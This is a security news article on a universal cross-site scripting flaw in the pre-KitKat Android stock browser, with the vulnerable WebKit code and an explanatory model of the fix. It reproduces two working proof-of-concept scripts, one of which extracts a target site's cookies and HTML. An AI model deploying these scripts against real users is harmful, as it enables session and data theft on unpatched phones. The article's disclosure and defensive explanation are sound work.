Legacy Android SOP bypass bug leaves billions of smartphones and tablets exposed


Pakistani researcher Rafay Baloch has uncovered a Same Origin Policy (SOP) bypass bug in the default Android browser (the stock AOSP browser), shipped in every version of the open source OS prior to 4.4 KitKat. He coordinated the disclosure with the security firm Rapid7, which released a Metasploit module for it. The default browser runs on the roughly 70% of Android devices still on those older versions of the OS, leaving billions of users exposed to the flaw.

Universal Cross-Site Scripting Vulnerability

The vulnerability, which affects the WebView component, occurs “when replacing the ‘data’ attribute of a given HTML object with a JavaScript URL scheme,” explained Tod Beardsley, technical lead for the Metasploit framework. Because the <object> loads its target page like a frame, the javascript: URL ends up executing in the target page's origin, so an attacker can use the UXSS flaw to scrape cookie data and page contents from a vulnerable browser window, Rapid7 said. The company noted that target URLs that send an X-Frame-Options header are not affected: the browser then refuses to load them into the object in the first place, so there is no cross-origin document for the script to run in. The security hole can be exploited on all versions of the Android Open Source Project (AOSP) browser, and in applications that render pages through the same WebView component.

Drawback of being Open Source

Google did release a patch for this flaw. However, a major drawback of the way the Android ecosystem works is that it is up to the manufacturers to propagate updates to their users, which many of them do not bother to do. This is felt every time Google releases a new version of Android, and the pinch is being felt now. Since most manufacturers may not bother with the update, millions who are using an older version of Android are left stuck with this vulnerability indefinitely, unless they buy a new handset that ships with the latest version, Android 5.0 Lollipop. But these users generally belong to the lower-mid and mid-range segment and could not afford the latest handset in the first place, so buying a new one isn't really an option for them.

“For many, many people, buying a new phone just isn’t practical; the people who are most likely affected by ‘legacy’ Android bugs are the same people who couldn’t afford a fancy ‘latest’ Android handset in the first place,” Beardsley said in a blog post. “In other words, it looks like a billion phones aren’t going to see this patch any time soon, if ever. It’s nice that the patch exists, but Google doesn’t seem to have any practical way of getting it out to the world.”

Proof of Concept

The following is the proof of concept (exploit code as published, with comments added):

<script>
window.onload = function()
{
    // Embed a cross-origin page (bing.com) in an <object>.
    object = document.createElement("object");
    object.setAttribute("data", "https://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
        // Once the cross-origin document has loaded, swap the data URL for a
        // javascript: URL. The vulnerable browser runs it inside bing.com's
        // document instead of refusing the cross-origin navigation.
        object.setAttribute("data", "javascript:alert(document.domain)");
        // Touching innerHTML makes the <object> re-evaluate its data attribute,
        // so the navigation to the javascript: URL actually happens.
        object.innerHTML = "foobar";
    }
}
</script>

The PoC is easy to follow for anyone with some JavaScript background. For the uninitiated, Rafay has given the following breakdown:

The above code creates an object with a data attribute, which loads a URL from another origin, in this case "https://www.bing.com". Once it has loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line, object.innerHTML = "foobar";, is essential for the PoC to work, so that the navigation request is performed.

Proof of Concept Using postMessage

The following PoC uses the HTML5 postMessage call to send document.cookie and the page's innerHTML from the target's origin back to the attacker's main window.

<script>
window.onload = function()
{
    // Same setup as before: load the cross-origin target into an <object>.
    object = document.createElement("object");
    object.setAttribute("data", "https://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
        // The javascript: URL runs inside the target's document, so `document`
        // here is bing.com's: its cookies and markup are posted to the top window.
        object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";
        object.innerHTML = "foobar";
    }
}

// The attacker's page receives the stolen data.
window.onmessage = function(m){
    alert(m.data);
}
</script>

Vulnerable Code

Rafay has also pointed to the vulnerable WebKit code, an excerpt of which is reproduced below. HTMLPlugInImageElement::allowedToLoadFrameURL decides whether the URL assigned to an <object>'s data attribute may be loaded into the object's frame; as excerpted, it only enforces the frame-count cap and does not check whether a javascript: URL is being pointed at a document from another origin.

bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
{
    ASSERT(document());
    ASSERT(document()->frame());
    if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
        return false;
    KURL completeURL = document()->completeURL(url);
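To make the decision behind that excerpt concrete, the following is an added JavaScript model (not code from the article, from Rafay Baloch or from WebKit) of the check a browser has to make when script changes the `data` attribute of an <object> that already holds a cross-origin document. It places the permissive behaviour next to a corrected one that refuses a javascript: URL unless the embedding page and the embedded document share an origin, and it also models why a target that sends X-Frame-Options is out of reach, as Rapid7 noted. The origins, URLs, the MAX_FRAMES value and the function names are assumptions chosen for illustration.

```javascript
// Added example: a model of the <object> data-attribute navigation check.
// Nothing here is WebKit code; names and constants are assumptions for illustration.

const MAX_FRAMES = 200; // stands in for Page::maxNumberOfFrames; the real value is not given on this page

// Origin (scheme://host[:port]) of a URL, or null for schemes that have no origin
// of their own, such as javascript: and data:. `base` resolves relative URLs.
function originOf(url, base) {
  const u = new URL(url, base);
  if (u.protocol === 'javascript:' || u.protocol === 'data:' || u.protocol === 'about:') {
    return null;
  }
  return u.origin;
}

// Model of the vulnerable check: the only thing it refuses is exceeding the frame cap,
// so a javascript: URL is accepted regardless of whose document is inside the object.
function vulnerableAllowedToLoadFrameUrl(embedderUrl, contentUrl, newUrl, frameCount = 0) {
  if (frameCount >= MAX_FRAMES) return false;
  return true;
}

// Model of the corrected check: a javascript: URL may only be navigated into the object
// when the embedding document's origin can access the document currently inside it, i.e.
// when both are the same origin. Ordinary http(s) URLs are still allowed; they replace the
// embedded document with a new one rather than running script in the existing one.
function fixedAllowedToLoadFrameUrl(embedderUrl, contentUrl, newUrl, frameCount = 0) {
  if (frameCount >= MAX_FRAMES) return false;
  const target = new URL(newUrl, embedderUrl);
  if (target.protocol === 'javascript:' && contentUrl !== null) {
    return originOf(embedderUrl) === originOf(contentUrl);
  }
  return true;
}

// An <object> loads its target like a frame, so the target's X-Frame-Options header is
// honoured. DENY, or SAMEORIGIN from a cross-origin embedder, keeps the document out of
// the object entirely, so there is nothing for the javascript: URL to run against.
function frameLoadPermitted(xfoHeader, embedderUrl, targetUrl) {
  if (!xfoHeader) return true;
  const value = xfoHeader.trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return originOf(embedderUrl) === originOf(targetUrl);
  return true; // unrecognised values are ignored by browsers
}

// Replays the article's PoC against one of the two models and reports the outcome.
function simulatePoc(model, embedderUrl, targetUrl, xfoHeader) {
  if (!frameLoadPermitted(xfoHeader, embedderUrl, targetUrl)) return 'blocked by X-Frame-Options';
  const payload = 'javascript:alert(document.domain)';
  if (!model(embedderUrl, targetUrl, payload)) return 'blocked by same-origin check';
  // The javascript: URL executes inside the document the object currently holds.
  return 'script runs in ' + originOf(targetUrl);
}

const ATTACKER = 'http://attacker.example/poc.html'; // constructed attacker page, not a real site
const TARGET = 'https://www.bing.com/';              // the target used in the PoC above

console.log('vulnerable:', simulatePoc(vulnerableAllowedToLoadFrameUrl, ATTACKER, TARGET, null));
console.log('fixed:     ', simulatePoc(fixedAllowedToLoadFrameUrl, ATTACKER, TARGET, null));
console.log('with XFO:  ', simulatePoc(vulnerableAllowedToLoadFrameUrl, ATTACKER, TARGET, 'SAMEORIGIN'));
```

Run with Node.js. The vulnerable model reports the script running in bing.com's origin, the fixed model blocks it, and a SAMEORIGIN header on the target blocks the attack even against the vulnerable model, which is the mitigation a site operator controls while waiting for a browser update that may never arrive.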

If you are a security researcher or a white hat hacker, you can download Rapid7's Metasploit module for the Android browser UXSS from here. Use the module only if you are familiar with Metasploit.

Rafay has published further PoCs and the fix on his blog, linked below.

Resource: Rafay Hacking Articles
